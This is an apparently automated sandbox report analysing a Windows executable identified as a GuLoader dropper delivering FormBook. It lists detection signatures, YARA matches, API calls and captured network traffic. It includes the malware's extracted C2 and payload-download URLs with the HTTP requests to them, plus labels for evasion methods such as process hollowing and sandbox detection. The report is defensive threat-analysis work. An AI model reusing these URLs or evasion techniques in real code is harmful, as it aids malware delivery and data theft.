Windows Analysis Report RYATPPETU.exe

Overview

General Information

Sample Name: RYATPPETU.exe
Analysis ID: 510462
MD5: 7a4b8b634d2e94cd1e458af5918be3aa
SHA1: b6989ba569206ab6527aff0f8bd3278371ef7953
SHA256: 056477676a6b327511c22c10e77e4e5f3653b40528109d7715a9e9efffb4d068
Tags: exeGuLoader
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lrbounee.xyz/kb8y/"], "decoy": ["kurdestates.com", "jojoinu.site", "humanblossoms.com", "pnmingyue.com", "breathewellductcleaning.com", "2631blg.xyz", "growwithgardiner.net", "dirtyfrenchdubai.com", "atlynnmusic.online", "vongquayfreefire247.com", "tafzba064.xyz", "realdealtrujillo.com", "liveartexperiences.com", "saimashafique.com", "istanbulmasajreklam.xyz", "fhwy6.com", "tecladistaemfoco.com", "libertyshelly.com", "raduanis.com", "hairshop-wave.com", "waytubeissue.top", "taurustwinscreation.com", "pashtointl.com", "yourfacedesigns.com", "elitbahistv9.com", "cerveceriachapultepectx.com", "vitalingredientsforliving.com", "wezdum.xyz", "matyherbs.com", "beffr.xyz", "mobilenftexchange.com", "tucsonpoolsservices.com", "sn-699.com", "quintasenalquiler.com", "radyometre.com", "victoryinthemaking.com", "stocolour.com", "social-data-company.com", "supportudc.xyz", "larrythecat.net", "candlessenceuk.com", "luciusbullens.com", "indianaexoticshop.com", "punkjoin.com", "effectivetherapeutics.com", "xybernft.com", "enaturism.xyz", "battlegroundbuzz.com", "bookseparat.com", "pepsicoinvest.xyz", "techexpertacademy.com", "yapbicicek.xyz", "kawaii-to-the-core.com", "afterthesethings.com", "inboxboree.com", "brooklyngats.com", "kc1628.com", "gfooveed.xyz", "sarabicompany.com", "emtreeconsulting.com", "chandcollege.com", "revolutiongaming.xyz", "babyunspillabowls.com", "etr6safvu8.com"]}
Source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://blumeconstructionllc.com/bin_NX"}
Multi AV Scanner detection for submitted file
Source: RYATPPETU.exe Virustotal: Detection: 31% Perma Link
Source: RYATPPETU.exe ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: RYATPPETU.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 15.2.cmmon32.exe.549f840.4.unpack Avira: Label: TR/Dropper.Gen
Source: 15.2.cmmon32.exe.3254318.1.unpack Avira: Label: TR/Dropper.Gen
Source: 0.2.RYATPPETU.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.2.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.3.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.1.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.RYATPPETU.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen

Compliance:

barindex
Uses 32bit PE files
Source: RYATPPETU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 45.82.177.176:443 -> 192.168.2.5:49697 version: TLS 1.2
Source: Binary string: cmmon32.pdb source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp, cmmon32.exe, 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RYATPPETU.exe, cmmon32.exe

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop ebx 15_2_02EE7B1B

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.etr6safvu8.com
Source: C:\Windows\explorer.exe Domain query: www.lrbounee.xyz
Source: C:\Windows\explorer.exe Network Connect: 172.67.161.80 80 Jump to behavior
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.lrbounee.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lrbounee.xyz/kb8y/
Source: Malware configuration extractor URLs: https://blumeconstructionllc.com/bin_NX
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1Host: www.lrbounee.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /bin_NXOEaeagUq10.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: blumeconstructionllc.comCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 18:18:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qqJ2Q9iCH1RRBQKJHt7%2Bpll1gj8DBHVrUY1%2ByxZfQWtFIoZbTjROcASUpSCa3xt1a89lPkmS%2FOwrIt5r%2Btdm6auT0AZrk%2Fg7h%2BdIwpX%2BPk3RXDFVKvodDvIcTZiBaHT4Vg1K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a4dede68e4e4ee6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 39 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 9f<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.15.8.3</center></body></html>
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp String found in binary or memory: https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp String found in binary or memory: https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp String found in binary or memory: https://soleprotect.de/bin_NXOEaeagUq10.bin
Source: unknown DNS traffic detected: queries for: blumeconstructionllc.com
Source: global traffic HTTP traffic detected: GET /bin_NXOEaeagUq10.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: blumeconstructionllc.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1Host: www.lrbounee.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 45.82.177.176:443 -> 192.168.2.5:49697 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: RYATPPETU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BB270 0_2_022BB270
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C16C5 0_2_022C16C5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C1A07 0_2_022C1A07
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BF407 0_2_022BF407
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BB81C 0_2_022BB81C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B8648 0_2_022B8648
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C005C 0_2_022C005C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C0689 0_2_022C0689
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B9095 0_2_022B9095
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B373D 0_2_022B373D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BE7B8 0_2_022BE7B8
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B8BC8 0_2_022B8BC8
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E696E30 8_2_1E696E30
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AEBB0 8_2_1E6AEBB0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731002 8_2_1E731002
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B090 8_2_1E68B090
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E741D55 8_2_1E741D55
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E670D20 8_2_1E670D20
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67F900 8_2_1E67F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05062D07 15_2_05062D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05061D55 15_2_05061D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB090 15_2_04FAB090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA841F 15_2_04FA841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051002 15_2_05051002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAD5E0 15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050620A8 15_2_050620A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F90D20 15_2_04F90D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9F900 15_2_04F9F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05062B28 15_2_05062B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB6E30 15_2_04FB6E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05061FF1 15_2_05061FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCEBB0 15_2_04FCEBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050622AE 15_2_050622AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05062EF7 15_2_05062EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFEBAB 15_2_02EFEBAB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFE1BB 15_2_02EFE1BB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD6F5 15_2_02EFD6F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFEECA 15_2_02EFEECA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE9E4B 15_2_02EE9E4B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE9E50 15_2_02EE9E50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE2FB0 15_2_02EE2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE2D87 15_2_02EE2D87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE2D90 15_2_02EE2D90
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFDD62 15_2_02EFDD62
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04F9B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BB270 NtWriteVirtualMemory,NtAllocateVirtualMemory, 0_2_022BB270
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C10AF NtProtectVirtualMemory, 0_2_022C10AF
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_1E6B9660
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A50 NtCreateFile,LdrInitializeThunk, 8_2_1E6B9A50
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A20 NtResumeThread,LdrInitializeThunk, 8_2_1E6B9A20
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_1E6B9A00
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_1E6B96E0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9710 NtQueryInformationToken,LdrInitializeThunk, 8_2_1E6B9710
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_1E6B97A0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9780 NtMapViewOfSection,LdrInitializeThunk, 8_2_1E6B9780
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_1E6B9860
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9840 NtDelayExecution,LdrInitializeThunk, 8_2_1E6B9840
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B98F0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_1E6B98F0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9540 NtReadFile,LdrInitializeThunk, 8_2_1E6B9540
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_1E6B9910
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B99A0 NtCreateSection,LdrInitializeThunk, 8_2_1E6B99A0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9670 NtQueryInformationProcess, 8_2_1E6B9670
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9650 NtQueryValueKey, 8_2_1E6B9650
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A10 NtQuerySection, 8_2_1E6B9A10
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9610 NtEnumerateValueKey, 8_2_1E6B9610
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B96D0 NtCreateKey, 8_2_1E6B96D0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A80 NtOpenDirectoryObject, 8_2_1E6B9A80
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9760 NtOpenProcess, 8_2_1E6B9760
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9770 NtSetInformationFile, 8_2_1E6B9770
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BA770 NtOpenThread, 8_2_1E6BA770
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9730 NtQueryVirtualMemory, 8_2_1E6B9730
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9B00 NtSetValueKey, 8_2_1E6B9B00
